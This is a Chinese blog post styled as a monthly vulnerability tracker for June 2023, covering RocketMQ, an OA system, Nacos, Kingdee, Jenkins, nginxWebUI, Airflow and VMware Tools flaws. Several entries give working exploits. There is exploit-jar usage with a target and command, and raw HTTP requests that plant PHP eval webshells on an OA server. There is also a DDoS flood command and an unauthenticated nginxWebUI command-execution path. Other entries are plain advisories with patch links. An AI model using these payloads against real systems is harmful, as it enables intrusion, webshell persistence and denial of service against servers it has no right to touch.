正文

[XJ-01] 6月漏洞追踪月刊

admin
admin V管理员 /0 评论 /315 阅读
0629
此篇文章发布距今已超过581天,您需要注意文章的内容或图片是否可用!



寻迹 · 01

寻迹第[1]期

Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)

POC

# 下载POC
https://github.com/SuperZero/CVE-2023-33246
# 使用
java -jar CVE-2023-33246.jar -ip "目标控制台地址" -cmd "执行的命令"

某oa 11.10 未授权任意文件上传

POC

# 方式一
http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
# 方式二
无法直接写入带有变量的 php 文件,所以首先利用 无参 webshell
<?php @eval(next(getallheaders()));
请求包
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1
Host: 192.168.222.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
再次生成
GET /general/test.php HTTP/1.1
Host: 192.168.121.147:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: file_put_contents('test1.php','<?php @eval($_REQUEST[1]);');
Content-Length: 28

Upgrade-Insecure-Requests: 1

nacos漏洞(CNVD-2023674205)

Nacos存在认证绕过漏洞的风险通告,漏洞编号为CNVD-2023674205,漏洞等级:高危。对此,开源网安SourceCheck开源组件安全及合规管理平台建议广大用户及时将Nacos升级到最新版本 2.2.0.1。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

金蝶云星空远程代码执行漏洞

POC

#https://github.com/chaitin/xpoc
#https://stack.chaitin.com/tool/detail?id=1036

xpoc -r 104 -t 目标URL

Jenkins跨站请求伪造漏洞CVE-2023-35141

漏洞类型:跨站请求伪造

影响:请求伪造

简述:在Jenkins 2.399及更早版本,LTS2.387.3及更早版本中,为了加载上下文操作的列表,会发送POST请求。如果URL的一部分包含了不充分转义的用户提供的值,受害者可能会被诱导在打开一个上下文菜单时发送一个POST请求到一个意想不到的端点。

DNS 递归导致 DoS 攻击——CVE-2023–31893

使用DDoS-Ripper进行DDoS攻击测试:

# https://github.com/palahsu/DDoS-Ripper
python3 DRipper.py -s 192.168.15.250 -t 135 -p 53:

nginxWebUI 远程命令执行漏洞

nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。

nginxWebUI <= 3.5.0

POC

/AdminPage/conf/runCmd?cmd=id

补丁

https://gitee.com/cym1102/nginxWebUI/releases

nginxWebUI 认证绕过/RCE漏洞

nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。

nginxWebUI <= 3.5.0

更新

https://gitee.com/cym1102/nginxWebUI/releases/tag/3.6.0

CVE-2023-35798 Apache Airflow任意文件读取漏洞

Apache Airflow是一个开源平台,用于开发、调度和监控批处理工作流。Airflow的可扩展的Python框架使你能够构建与几乎任何技术连接的工作流。一个网页界面帮助管理你的工作流的状态。Apache Airflow ODBC Provider、Apache Airflow MSSQL Provider中存在任意文件读取漏洞,攻击者利用此漏洞可获取服务器上任意文件内容。目前官方已发布漏洞修复版本,建议用户升级到安全版本

  • Apache Airflow ODBC Provider < 4.0.0

  • Apache Airflow MSSQL Provider < 3.4.1

CVE-2023-20867 VMware Tools身份验证绕过漏洞

VMware Tools是VMware公司的一款VMWare虚拟机自带的增强工具,它是VMware提供的用于增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。VMware Tools存在安全漏洞,该漏洞源于无法验证主机到客户的操作,从而影响客户虚拟机的机密性和完整性。

  • VMware Tools 12.x.x

  • VMware Tools 11.x.x

  • VMware Tools 10.3.x

更新

https://www.vmware.com

CVE-2023-34395 Apache Airflow ODBC Provider远程代码执行漏洞

Apache Airflow是一个开源平台,用于开发、调度和监控批处理工作流。Airflow的可扩展的Python框架使你能够构建与几乎任何技术连接的工作流。一个网页界面帮助管理你的工作流的状态。在OdbcHook中,由于可控的ODBC驱动程序参数允许加载任意动态链接库,从而导致命令执行。

更新

https://airflow.apache.org/

其它系列





[XJ-01] 6月漏洞追踪月刊


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-周飒博客